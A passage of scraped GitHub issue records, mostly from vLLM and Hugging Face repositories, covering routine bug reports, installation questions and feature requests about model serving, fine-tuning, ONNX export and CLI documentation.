pypi\n\n==============================\n vLLM Info\n==============================\nROCM Version : Could not collect\nvLLM Version : 0.8.5.post1\n```\n\n# How would you like to use vllm\n\nHi, I'm trying to integrate a custom multi-modal model (Qwen2_5_VLForConditionalGeneration_Vilavt) using the out-of-tree plugin system, following the official documentation and the vllm_add_dummy_model example.\n\n### The Issue:\n\nThe model loading behavior is inconsistent between single-GPU and multi-GPU (tensor parallel) modes:\n\n- Single-GPU (CUDA_VISIBLE_DEVICES=0): Everything works perfectly. The engine initializes, and I can run inference.\n- Multi-GPU (CUDA_VISIBLE_DEVICES=0,1,2,3): The engine fails to start. Although the logs from VllmWorker processes show that my custom model is successfully registered, the main EngineCore process throws a ValueError, complaining that the model cannot be found.\n\nI've successfully created a package `vllm_vilavt`, installed it with `pip install -e .` , and my `setup.py` correctly points to a register() function in the entry_points.\n\n\nMy `setup.py`:\n```\nfrom setuptools import setup, find_packages\n\nsetup(\n name=\"vllm_vilavt\",\n version=\"0.1\",\n packages=find_packages(),\n entry_points={\n \"vllm.general_plugins\":\n [\"register_vilavt_model = vllm_", "url": "https://github.com/vllm-project/vllm/issues/27265", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-21T14:17:17Z", "updated_at": "2025-10-25T13:19:40Z", "comments": 1, "user": "Hyperwjf" }, { "repo": "vllm-project/vllm", "number": 27263, "title": "[Responses API] Support tool calling and ouput token streaming", "body": "Splitting off from #14721\n\n> FYI a start has been made here https://github.com/vllm-project/vllm/pull/20504\n> \n> That PR (which was merged to `main` on [7/9/2025](https://github.com/vllm-project/vllm/pull/20504#event-18495144925)) explicitly has an unchecked boxes for\n> \n> * [ ] Tool/functional calling support\n> * [ ] Output token streaming\n> \n> Any plans to implement those features? I think that is what is needed to support agentic coding tools like codex. See:\n> \n> * https://docs.vllm.ai/projects/recipes/en/latest/OpenAI/GPT-OSS.html#harmony-format-support \n\n _Originally posted by @bartlettroscoe in [#14721](https://github.com/vllm-project/vllm/issues/14721#issuecomment-3321963360)_", "url": "https://github.com/vllm-project/vllm/issues/27263", "state": "open", "labels": [], "created_at": "2025-10-21T12:36:44Z", "updated_at": "2025-12-07T01:06:46Z", "comments": 4, "user": "markmc" }, { "repo": "vllm-project/vllm", "number": 27252, "title": "[Usage]: \u201d@app.post(\"/generate\")\u201c API is support qwen2_vl or not?", "body": "### Your current environment\n\ni want tot know \u201d@app.post(\"/generate\")\u201c API support qwen2_vl or not?\n\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27252", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-21T07:30:11Z", "updated_at": "2025-10-21T07:30:11Z", "comments": 0, "user": "wwkww" }, { "repo": "huggingface/lerobot", "number": 2269, "title": "how to configure pi0_base to train with single camera dataset", "body": "\n\nHi,\nI'm trying to train pi0_base with \"lerobot/aloha_sim_transfer_cube_human\" dataset which has only one camera input \"observation.images.top\". However, pi0 seems to expect three camera inputs:\n\"observation.images.base_0_rgb\",\n\"observation.images.left_wrist_0_rgb\",\n\"observation.images.right_wrist_0_rgb\"\n\n\"ValueError: All image features are missing from the batch. At least one expected. (batch: dict_keys(['action', 'next.reward', 'next.done', 'next.truncated', 'info', 'action_is_pad', 'task', 'index', 'task_index', 'observation.images.top', 'observation.state', 'observation.language.tokens', 'observation.language.attention_mask'])) (image_features: {'observation.images.base_0_rgb': PolicyFeature(type=, shape=(3, 224, 224)), 'observation.images.left_wrist_0_rgb': PolicyFeature(type=, shape=(3, 224, 224)), 'observation.images.right_wrist_0_rgb': PolicyFeature(type=, shape=(3, 224, 224))}) Exception in thread Thread-2 (_pin_memory_loop): Traceback (most recent call last): File \"/root/.local/share/mamba/envs/lerobot/lib/python3.10/threading.py\", line 1016, in _bootstrap_inner\"\n\nIs there a command-line argument I can use to set the single camera input to train with the pi0_base model?\n", "url": "https://github.com/huggingface/lerobot/issues/2269", "state": "open", "labels": [ "question", "policies", "dataset" ], "created_at": "2025-10-21T01:32:50Z", "updated_at": "2025-10-21T17:36:17Z", "user": "dalishi" }, { "repo": "vllm-project/vllm", "number": 27233, "title": "gguf run good", "body": "### Your current environment\n\nfrom vllm import LLM, SamplingParams\n\ngguf_path = \"/home/m/Desktop/vllm/vllm/examples/offline_inference/basic/Qwen3-1.7B-GGUF/Qwen3-1.7B-Q6_K.gguf\"\n\nllm = LLM(\n gguf_path,\n tokenizer=\"Qwen/Qwen3-1.7B\"\n)\n\nparams = SamplingParams(\n temperature=0.8,\n top_p=0.9,\n top_k=40,\n max_tokens=200,\n)\n\noutputs = llm.generate([\"Who is Napoleon Bonaparte?\"], params)\nprint(outputs[0].outputs[0].text)\n\n\n### How would you like to use vllm\n\nI want to run inferevenv) m@m-HP-Z440-Workstation:~/Desktop/vllm/vllm/examples/offline_inference/basic$ \n(venv) m@m-HP-Z440-Workstation:~/Desktop/vllm/vllm/examples/offline_inference/basic$ python3\nPython 3.12.3 (main, Aug 14 2025, 17:47:21) [GCC 13.3.0] on linux\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> from vllm import LLM, SamplingParams\nINFO 10-21 03:05:39 [__init__.py:216] Automatically detected platform cuda.\n>>> \n>>> gguf_path = \"/home/m/Desktop/vllm/vllm/examples/offline_inference/basic/Qwen3-1.7B-GGUF/Qwen3-1.7B-Q6_K.gguf\"\n>>> \n>>> llm = LLM(\n... gguf_path,\n... tokenizer=\"Qwen/Qwen3-1.7B\"\n... )\nINFO 10-21 03:05:41 [utils.py:233] non-default args: {'tokenizer': 'Qwen/Qwen3-1.7B', 'disable_log_stats': True, 'model': '/home/m/Desktop/vllm/vllm/examples/offline_inference/basic/Qwen3-1.7B-GGUF/Qwen3-1.7B-Q6_K.gguf'}\nINFO 10-21 03:06:14 [model.py:547] Resolved architecture: Qwen3ForCausalLM\n`torch_dtype` is deprecated! Use `dtype` instead!\nERROR 10-21 03:06:14 [config.py:278] Error retrieving safetensors: Repo id must be in the form 'repo_name' or 'namespace/repo_name': '/home/m/Desktop/vllm/vllm/examples/offline_inference/basic/Qwen3-1.7B-GGUF/Qwen3-1.7B-Q6_K.gguf'. Use `repo_type` argument if needed., retrying 1 of 2\nERROR 10-21 03:06:16 [config.py:276] Error retrieving safetensors: Repo id must be in the form 'repo_name' or 'namespace/repo_name': '/home/m/Desktop/vllm/vllm/examples/offline_inference/basic/Qwen3-1.7B-GGUF/Qwen3-1.7B-Q6_K.gguf'. Use `repo_type` argument if needed.\nINFO 10-21 03:06:16 [model.py:1730] Downcasting torch.float32 to torch.bfloat16.\nINFO 10-21 03:06:16 [model.py:1510] Using max model len 32768\nINFO 10-21 03:06:16 [scheduler.py:205] Chunked prefill is enabled with max_num_batched_tokens=8192.\n(EngineCore_DP0 pid=67528) INFO 10-21 03:06:41 [core.py:644] Waiting for init message from front-end.\n(EngineCore_DP0 pid=67528) INFO 10-21 03:06:41 [core.py:77] Initializing a V1 LLM engine (v0.11.0) with config: model='/home/m/Desktop/vllm/vllm/examples/offline_inference/basic/Qwen3-1.7B-GGUF/Qwen3-1.7B-Q6_K.gguf', speculative_config=None, tokenizer='Qwen/Qwen3-1.7B', skip_tokenizer_init=False, tokenizer_mode=auto, revision=None, tokenizer_revision=None, trust_remote_code=False, dtype=torch.bfloat16, max_seq_len=32768, download_dir=None, load_format=gguf, tensor_parallel_size=1, pipeline_parallel_size=1, data_parallel_size=1, disable_custom_all_reduce=False, quantization=gguf, enforce_eager=False, kv_cache_dtype=auto, device_config=cuda, structured_outputs_config=StructuredOutputsConfig(backend='auto', disable_fallback=False, disable_any_whitespace=False, disable_additional_properties=False, reasoning_parser=''), observability_config=ObservabilityConfig(show_hidden_metrics_for_version=None, otlp_traces_endpoint=None, collect_detailed_traces=None), seed=0, served_model_name=/home/m/Desktop/vllm/vllm/examples/offline_inference/basic/Qwen3-1.7B-GGUF/Qwen3-1.7B-Q6_K.gguf, enable_prefix_caching=True, chunked_prefill_enabled=True, pooler_config=None, compilation_config={\"level\":3,\"debug_dump_path\":\"\",\"cache_dir\":\"\",\"backend\":\"\",\"custom_ops\":[],\"splitting_ops\":[\"vllm.unified_attention\",\"vllm.unified_attention_with_output\",\"vllm.mamba_mixer2\",\"vllm.mamba_mixer\",\"vllm.short_conv\",\"vllm.linear_attention\",\"vllm.plamo2_mamba_mixer\",\"vllm.gdn_attention\",\"vllm.sparse_attn_indexer\"],\"use_inductor\":true,\"compile_sizes\":[],\"inductor_compile_config\":{\"enable_auto_functionalized_v2\":false},\"inductor_passes\":{},\"cudagraph_mode\":[2,1],\"use_cudagraph\":true,\"cudagraph_num_of_warmups\":1,\"cudagraph_capture_sizes\":[512,504,496,488,480,472,464,456,448,440,432,424,416,408,400,392,384,376,368,360,352,344,336,328,320,312,304,296,288,280,272,264,256,248,240,232,224,216,208,200,192,184,176,168,160,152,144,136,128,120,112,104,96,88,80,72,64,56,48,40,32,24,16,8,4,2,1],\"cudagraph_copy_inputs\":false,\"full_cuda_graph\":false,\"use_inductor_graph_partition\":false,\"pass_config\":{},\"max_capture_size\":512,\"local_cache_dir\":null}\n[Gloo] Rank 0 is connected to 0 peer ranks. Expected number of connected peer ranks is : 0\n[Gloo] Rank 0 is connected to 0 peer ranks. Expected number of connected peer ranks is : 0\n[Gloo] Rank 0 is connected to 0 peer ranks. Expected number of connected peer ranks is : 0\n[Gloo] Rank 0 is connected to 0 peer ranks. Expected number of connected peer ranks is : 0\n[Gloo] Rank 0 is connected to 0 peer ranks. Ex", "url": "https://github.com/vllm-project/vllm/issues/27233", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-21T00:11:26Z", "updated_at": "2025-10-22T00:44:10Z", "comments": 12, "user": "kmnnmk212-source" }, { "repo": "vllm-project/vllm", "number": 27228, "title": "[Installation]: Compatibility with PyTorch 2.9.0?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How you are installing vllm\n\nIs there a version of vllm that is compatible with the latest PyTorch release 2.9.0?\n\n```\npip install vllm==0.11.0\npip install torch==2.9.0\n```\n\n```\n$ vllm bench latency --input-len 256 --output-len 256 --model Qwen3/Qwen3-8B --batch-size 1\nterminate called after throwing an instance of 'std::bad_alloc'\n what(): std::bad_alloc\nAborted (core dumped)\n```\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27228", "state": "closed", "labels": [ "installation" ], "created_at": "2025-10-20T21:10:24Z", "updated_at": "2025-10-21T22:40:15Z", "comments": 3, "user": "andrewor14" }, { "repo": "vllm-project/vllm", "number": 27208, "title": "[Feature]: Upgrade CUDA version to 12.9.1 in docker images", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nThe current builds display warning logs like these\n```\nWarning: please use at least NVCC 12.9 for the best DeepGEMM performance\n```\n\nCan we bump this version easily?\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27208", "state": "closed", "labels": [ "feature request" ], "created_at": "2025-10-20T16:08:49Z", "updated_at": "2025-10-21T21:20:19Z", "comments": 1, "user": "jhuntbach-bc" }, { "repo": "huggingface/lerobot", "number": 2259, "title": "Clarifications on fine-tuning on different envs and embodiments", "body": "Hi everyone,\nI\u2019m currently working on fine-tuning SmolVLA and \u03c0\u2080 using **[RLBench](https://github.com/stepjam/RLBench)**. The robot setup is a Franka Emika Panda (7DoF + gripper), and I\u2019ve already collected custom LeRobot datasets for a pick-and-place task ([available on my Hugging Face](https://huggingface.co/RonPlusSign)) with 500 demo episodes.\n\nI\u2019ve successfully fine-tuned [OpenVLA](https://github.com/openvla/openvla) using its official repository, where the action space is defined as \u0394EEF pose (Euler rotation) + gripper, and the state as \u0394EEF pose (quaternion rotation) + gripper, using a single observation image (left shoulder), reaching around 22% success rate.\n\nHowever, when trying to fine-tune SmolVLA, despite the training running without issues (loss converges and wandb plots look fine), the evaluation yields 0% success. I suspect I\u2019m misunderstanding how to correctly define the state and action spaces for SmolVLA in this context.\nSince RLBench is not one of the officially supported envs, I created an evaluation script (you can find it [here](https://github.com/RonPlusSign/RLBench/blob/master/test_smolvla.py)), similar to the examples provided in [Robot Learning: A Tutorial](https://github.com/fracapuano/robot-learning-tutorial/blob/main/snippets/ch5/02_using_smolvla.py) (thanks @fracapuano for the amazing work!).\n\n\"Image\"\n\nFor example, I started the finetuning using:\n```sh\npython src/lerobot/scripts/lerobot_train.py \\\n --policy.path=HuggingFaceVLA/smolvla_libero \\\n --policy.repo_id=RonPlusSign/smolvla_PutRubbishInBin \\\n --dataset.repo_id=RonPlusSign/RLBench-LeRobot-v3-PutRubbishInBin \\\n --batch_size=32 \\\n --output_dir=outputs/train/smolvla_finetuned_rubbish \\\n --policy.device=cuda \\\n --wandb.enable=true \\\n --save_freq=10000 \\\n --steps=60000\n```\n\nI also tested smaller finetunings (e.g. 5k, 10k, 20k steps).\n\nHere are some specific points I\u2019d like to clarify:\n\n1. What are the exact action and state spaces used in SmolVLA and \u03c0\u2080 pretraining? (\u0394EEF pose, absolute EEF pose, joint positions, joint velocities, ... and angle representations e.g. quaternion or Euler).\n\n2. Regarding camera inputs: does the naming or number of cameras affect the model performance? Should I stick to the _exact_ names provided in the `config.json` file, such as `observation.images.image` and `observation.images.image2` (front/wrist), similar to pretraining? Or is it fine to use different camera names and/or add extra views? Is there a way to override the existing input and output features or this means that the pretrain would be wasted?\n\n3. The base model [lerobot/smolvla_base](https://huggingface.co/lerobot/smolvla_base) is pretrained on the SO100/SO101 robot, so I assume it might not transfer well to Franka Panda tasks \u2014 is that correct?\n\n4. Would it make more sense to start from a model trained on Franka, e.g. [HuggingFaceVLA/smolvla_libero](https://huggingface.co/HuggingFaceVLA/smolvla_libero), or it's still a different type of embodiment (it seems with 6DoF+gripper, which is not my case)?\n\n5. Are the datasets [HuggingFaceVLA/libero](https://huggingface.co/datasets/HuggingFaceVLA/libero) and/or [HuggingFaceVLA/smol-libero](https://huggingface.co/datasets/HuggingFaceVLA/smol-libero) the ones used for pretraining [HuggingFaceVLA/smolvla_libero](https://huggingface.co/HuggingFaceVLA/smolvla_libero)?\n\n6. In [HuggingFaceVLA/smol-libero](https://huggingface.co/datasets/HuggingFaceVLA/smol-libero) the actions have dimension 7, which doesn\u2019t clearly map to 7 joint angles + gripper. Are these absolute joint positions, EEF poses, or something else? Does LIBERO use a 6DoF or 7DoF Franka setup? If 6DoF, which joint is excluded?\n\nAny guidance on these points (or pointers to where this information is documented) would be very helpful \u2014 I\u2019ve been trying to align my setup with the pretrained models but haven\u2019t found clear references for these details.\n\nThanks a lot for your time and for maintaining this project!", "url": "https://github.com/huggingface/lerobot/issues/2259", "state": "open", "labels": [ "question", "policies", "simulation" ], "created_at": "2025-10-20T13:24:22Z", "updated_at": "2025-12-23T10:37:31Z", "user": "RonPlusSign" }, { "repo": "vllm-project/vllm", "number": 27184, "title": "[Doc]: Multi-Modal Benchmark is too simple", "body": "### \ud83d\udcda The doc issue\n\nThe latest doc about Multi-Modal Benchmark shows \uff1a \n- 1\u3001download sharegpt4v_instruct_gpt4-vision_cap100k.json and COCO's 2017 Train images\n- 2\u3001vllm serve and vllm bench serve\nBut there is so much details to concern: \n- 1\u3001delete all json that not is coco`s in sharegpt4v_instruct_gpt4-vision_cap100k.json\n- 2\u3001place COCO's 2017 Train images in /root directory like /train2017/, \n- 3\u3001 vllm serve --allowed-local-media-path /train2017/ , because vllm use the condition:\n```\nif allowed_local_media_path not in filepath.resolve().parents\n```\n the ` filepath.resolve().parents` is [\"/train2017\", \"/\"], so the easiest\u200c way is to place the images in /train2017/ and set `--allowed-local-media-path /train2017/`\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27184", "state": "open", "labels": [ "documentation" ], "created_at": "2025-10-20T06:24:18Z", "updated_at": "2025-10-20T16:44:17Z", "comments": 2, "user": "BigFaceBoy" }, { "repo": "vllm-project/vllm", "number": 27182, "title": "[Feature]: INT8 Support in Blackwell Arch", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nhello, I want to use w8a8(int8) in blackwell gpus, and when I read the source code, it says, the int8 is not support by sm120. According to the nvidia-ptx-instructions, blackwell series gpus still have a int8 tensor, is there another way we use w8a8 int8 in rtx5090 by vllm now \n\"Image\" \n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27182", "state": "open", "labels": [ "feature request" ], "created_at": "2025-10-20T06:04:03Z", "updated_at": "2025-10-20T06:04:03Z", "comments": 0, "user": "nhanngoc94245" }, { "repo": "huggingface/optimum", "number": 2376, "title": "Support qwen2_5_vl for ONNX export", "body": "### Feature request\n\nI would like to be able to convert [this model](https://huggingface.co/prithivMLmods/DeepCaption-VLA-V2.0-7B) which is based on Qwen 2.5 VL architecture using optimum. Right now, I get the error:\n\n```\nValueError: Trying to export a qwen2_5_vl model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type qwen2_5_vl to be supported natively in the ONNX export.\n```\n\nI read the documentation but I have no idea how I'd go about setting the custom onnx config up.\n\n### Motivation\n\nQwen 2.5 VL is a SOTA architecture that is already being used in downstream models (see my example), so it is worth supporting.\n\n### Your contribution\n\nI can do research but I don't have enough experience with this codebase and ML code to contribute a PR.", "url": "https://github.com/huggingface/optimum/issues/2376", "state": "open", "labels": [], "created_at": "2025-10-19T22:08:28Z", "updated_at": "2026-01-06T08:03:39Z", "comments": 8, "user": "ayan4m1" }, { "repo": "huggingface/transformers", "number": 41731, "title": "transformers CLI documentation issue ", "body": "### System Info\n\n- `transformers` version: 5.0.0.dev0\n- Platform: Linux-6.6.87.2-microsoft-standard-WSL2-x86_64-with-glibc2.39\n- Python version: 3.12.9\n- Huggingface_hub version: 1.0.0.rc6\n- Safetensors version: 0.6.2\n- Accelerate version: 1.10.1\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.8.0+cu128 (CUDA)\n- Using distributed or parallel set-up in script?: no\n- Using GPU in script?: yes\n- GPU type: NVIDIA GeForce RTX 3050 Laptop GPU\n\n### Who can help?\n\n@stevhliu \n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] Update the documentation for the transformers-cli\n- [ ] Set the default --fixed flag to \"pipe\" in place of \"infer\" \n\n### Reproduction\n\necho -e \"Plants create [MASK] through a process known as photosynthesis.\" | transformers run --task fill-mask --model google-bert/bert-base-uncased --device 0\n\n(as shown in documentation)\n\n\n**output:-**\n\n\"Image\"\n\n\n\n### Expected behavior\n\n\n**output:**\n\n\"Image\"\n\n\n\n**Fix/updated command:**\n\n echo -e \"Plants create [MASK] through a process known as photosynthesis.\" | transformers run fill-mask --model google-bert/bert-base-uncased --device 0 --format pipe\n\nThis indicates the current working format is:-\n\ntransformers run --model --format [options]\n\n**update**\n\nwe could let the default --format flag be \"pipe\" instead of \"infer\" which is deprecated. so we could also write command as follows for most models :-\n \ntransformers run --model \n\n\n**Action Needed:** (documentation change) \n\nAll documentation for similar models should be updated for the transformer CLI inference \n\nI would like to confirm if my understanding is correct: should I go ahead and raise a PR to update the documentation and set the default as \"pipe\" for --format flag? I am relatively new to open source and would greatly appreciate any guidance or tips you could provide to ensure my contribution is appropriate and follows best practices.\n\n\n\n\n\n\n\n\n", "url": "https://github.com/huggingface/transformers/issues/41731", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-19T09:31:46Z", "updated_at": "2025-12-22T08:03:09Z", "comments": 14, "user": "ArjunPimpale" }, { "repo": "huggingface/chat-ui", "number": 1947, "title": "HuggingChat MoM (Mixture-of-Models) Integration Proposal \ud83e\udd17", "body": "# **HuggingChat MoM (Mixture-of-Models) Integration Proposal \ud83e\udd17**\n\n**Status:** Proposal \n**Date:** 2025-10-19 \n**Version:** 1.0\n**Authors**: vLLM-SR Team\n\n---\n\n## Executive Summary\n\nThis proposal outlines the integration of **vLLM Semantic Router** into HuggingChat as a new **MoM (Mixture-of-Models)** routing option. The integration will enable advanced intelligent routing capabilities including semantic caching, PII detection, and chain-of-thought (CoT) transparency, while maintaining full backward compatibility with the existing Omni (Arch router) implementation.\n\n---\n\n## 1. Motivation\n\n### Current State\n\n- HuggingChat currently supports **Omni** routing via the Arch router (`src/lib/server/router/arch.ts`)\n- Arch router provides basic route selection using LLM-based decision-making\n- Limited visibility into routing decisions and no semantic caching capabilities\n\n### Desired State\n\n- Support **MoM (Mixture-of-Models)** routing via vLLM Semantic Router\n- Enable advanced features: semantic caching, PII detection, intelligent routing\n- Provide transparent chain-of-thought (CoT) information for routing decisions\n- Maintain coexistence of both Omni and MoM routers for gradual rollout\n\n### Business Value\n\n1. **Performance**: Semantic caching reduces latency for repeated queries\n2. **Security**: PII detection protects user privacy\n3. **Transparency**: CoT information builds user trust\n4. **Flexibility**: Users can choose between Omni and MoM routing strategies\n5. **Dashboard Integration**: vLLM-SR dashboard provides monitoring and analytics\n\n### About vLLM Semantic Router\n\n**vLLM Semantic Router** is an intelligent routing system that embodies the **Mixture-of-Models (MoM)** philosophy, with modelName (**MoM**):\n\n```shell\ncurl -X POST http://localhost:8801/v1/chat/completions \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"model\": \"MoM\",\n \"messages\": [\n {\"role\": \"user\", \"content\": \"What is the derivative of x^2?\"}\n ]\n }'\n```\n\n- **Intelligent Routing**: Routes requests to the optimal model based on semantic understanding of the query, not just keyword matching\n- **Semantic Caching**: Leverages semantic similarity to cache responses, dramatically reducing latency for similar queries (not just exact matches)\n- **Semantic Chain Architecture**: Evolving toward a composable semantic chain where all stages are orchestrated in an extensible pipeline, enabling future enhancements and custom stage integration in work-in-progress \"SemanticChain\".\n- **Three-Stage Pipeline** (Extensible & Composable):\n - **Stage 1 - Prompt Guard**: Security-first approach with jailbreak detection and PII protection\n - **Stage 2 - Router Memory**: Intelligent semantic caching for performance optimization\n - **Stage 3 - Smart Routing**: Multi-level intelligent routing combining three complementary strategies:\n - **Domain Understanding**: Semantic classification of queries into domains (math, coding, general, etc.)\n - **Similarity-Based Routing**: Semantic similarity matching to route similar queries to optimal models\n - **Keyword-Based Routing**: Keyword pattern matching for explicit intent detection\n - These three routing strategies work together to provide comprehensive query understanding and optimal model selection\n - Future stages can be added to the pipeline without disrupting existing functionality\n- **Mixture-of-Models Philosophy**: Recognizes that no single model is optimal for all tasks. By intelligently routing different types of queries to different specialized models, it achieves:\n - Better accuracy through task-specific model selection\n - Cost optimization by using smaller models for simple tasks\n - Performance improvement through semantic understanding\n - Transparency via chain-of-thought visibility\n- **Production-Ready**: Battle-tested with comprehensive error handling, monitoring, and dashboard support\n- **Open Source**: vLLM Community-driven development with active maintenance and feature additions\n\n---\n\n## 2. Goals\n\n### Primary Goals\n\n- \u2705 Integrate vLLM Semantic Router as a new MoM routing option\n- \u2705 Extract and store chain-of-thought (CoT) metadata from vLLM-SR responses\n- \u2705 Support both Omni and MoM routers coexisting in the same system\n- \u2705 Expose CoT information to frontend for visualization\n\n### Secondary Goals\n\n- \u2705 Support A/B testing between Omni and MoM routers\n- \u2705 Integrate with vLLM-SR dashboard for monitoring\n\n---\n\n## 3. Non-Goals\n\n- \u274c Replace Omni router entirely (maintain coexistence)\n- \u274c Modify vLLM Semantic Router codebase\n- \u274c Implement custom semantic caching in HuggingChat (use vLLM-SR's caching)\n- \u274c Create new dashboard (integrate with existing vLLM-SR dashboard)\n- \u274c Support non-OpenAI-compatible endpoints for MoM\n\n---\n\n## 4. Design Principles\n\n### 1. **Backward Compatibility**\n\n- Existing Omni router functionality remains unchanged\n- No breaking changes to current APIs or configurations\n- Both routers can be configured independently\n\n### 2. **Transparency**\n\n- CoT inf", "url": "https://github.com/huggingface/chat-ui/issues/1947", "state": "open", "labels": [ "enhancement" ], "created_at": "2025-10-19T08:17:14Z", "updated_at": "2025-10-20T11:12:30Z", "comments": 3, "user": "Xunzhuo" }, { "repo": "huggingface/tokenizers", "number": 1877, "title": "encode bytes directly", "body": "Is there a way to directly encode bytes with a bpe based HF tokenizer without having to decode the string first? ", "url": "https://github.com/huggingface/tokenizers/issues/1877", "state": "open", "labels": [], "created_at": "2025-10-19T03:30:39Z", "updated_at": "2025-11-28T07:43:18Z", "comments": 2, "user": "tsengalb99" }, { "repo": "vllm-project/vllm", "number": 27154, "title": "[Installation]: How to reduce the vllm image", "body": "### Your current environment\n\nHi,\n\nI looked at docker pull vllm/vllm-openai:latest \u2014 the image is around 12 GB. I\u2019m exploring ways to reduce the vLLM image size specifically for NVIDIA L40s (i use linux amd64). any ideas?\ndoes building vllm from source help to reduce the image?\n\nHere\u2019s what I\u2019ve tried so far (but not sure how to install flashinfer):\n```\nFROM nvidia/cuda:12.1.0-runtime-ubuntu22.04\n\n# Install Python and pip\nRUN apt-get update && apt-get install -y python3 python3-pip && \\\n apt-get clean && rm -rf /var/lib/apt/lists/*\n\n# Install only vLLM and production dependencies\nRUN pip3 install --no-cache-dir vllm\n\n# Set CUDA arch for A100 (8.0)\nENV TORCH_CUDA_ARCH_LIST=\"8.9+PTX\"\n\n# Expose API port\nEXPOSE 8000\n\nENTRYPOINT [\"python3\", \"-m\", \"vllm.entrypoints.openai.api_server\"]\n```\n\nmore infos:\nhttps://discuss.vllm.ai/t/current-vllm-docker-image-size-is-12-64gb-how-to-reduce-it/1204/4\nhttps://docs.vllm.ai/en/latest/deployment/docker.html#building-vllm-s-docker-image-from-source\npr: https://github.com/vllm-project/vllm/pull/22377\n\n### How you are installing vllm\n\n```sh\npip install -vvv vllm\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27154", "state": "open", "labels": [ "installation" ], "created_at": "2025-10-18T17:52:07Z", "updated_at": "2025-10-20T17:45:39Z", "comments": 4, "user": "geraldstanje" }, { "repo": "vllm-project/vllm", "number": 27153, "title": "[Feature]: Allow vllm bench serve in non-streaming mode with /completions API", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nvLLM\u2019s bench serve currently supports recording benchmark results only in the streaming mode - recording metrics like TTFT, TPOT, ITL etc. For my use case benchmarking [llm-d ](https://github.com/llm-d/llm-d)which uses vLLM, I would like to enable vllm bench serve in non-streaming mode for the openai backend, recording only non-streaming latency metrics like E2E Latency. Overall, the changes required would be as follows:\n\n* Add a new Async Request Function - `async_request_openai_completions_non_streaming()` function in [`vllm/vllm/benchmarks/lib/endpoint_request_func.py`](https://github.com/vllm-project/vllm/blob/main/vllm/benchmarks/lib/endpoint_request_func.py) to support parsing of non-streaming vllm outputs.\n\n* Add a new benchmark argument: `benchmark_streaming`. If `benchmark_streaming` is set to False for the `openai` backend, then the above function `async_request_openai_completions_non_streaming()` is called instead of `async_request_openai_completions`.\n\n* Either modify [`vllm/benchmarks/serve.py`](https://github.com/vllm-project/vllm/blob/main/vllm/benchmarks/serve.py) or design a new benchmark script to calculate and save metrics, excluding streaming-only metrics like TTFT, TPOT and ITL.\n\nHappy to discuss and create PRs for the above implementation. Looking forward to thoughts and feedback.\n\n### Alternatives\n\nAnother option I'm considering is using [benchmark_throughput.py](https://github.com/vllm-project/vllm/blob/main/benchmarks/benchmark_throughput.py). However, it relies on the offline LLM library which does not serve my use-case of benchmarking the vllm server in non-streaming mode.\n\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27153", "state": "open", "labels": [ "feature request" ], "created_at": "2025-10-18T17:47:44Z", "updated_at": "2025-10-18T20:50:49Z", "comments": 0, "user": "susiejojo" }, { "repo": "huggingface/candle", "number": 3137, "title": "Strategic Discussion: Flicker's Hybrid Architecture for Lightweight Inference + Advanced Training", "body": "# Strategic Discussion: Flicker's Hybrid Architecture Evolution\n\n## Overview\nThis issue proposes a comprehensive strategic discussion about flicker's positioning and architecture evolution. The detailed proposal is documented in `STRATEGIC_DISCUSSION_PROPOSAL.md`.\n\n## Context\nDuring analysis of flicker's capabilities vs PyTorch, a critical strategic question emerged: Should flicker be primarily a **lightweight inference engine** or evolve into a **comprehensive training framework**?\n\n## Proposed 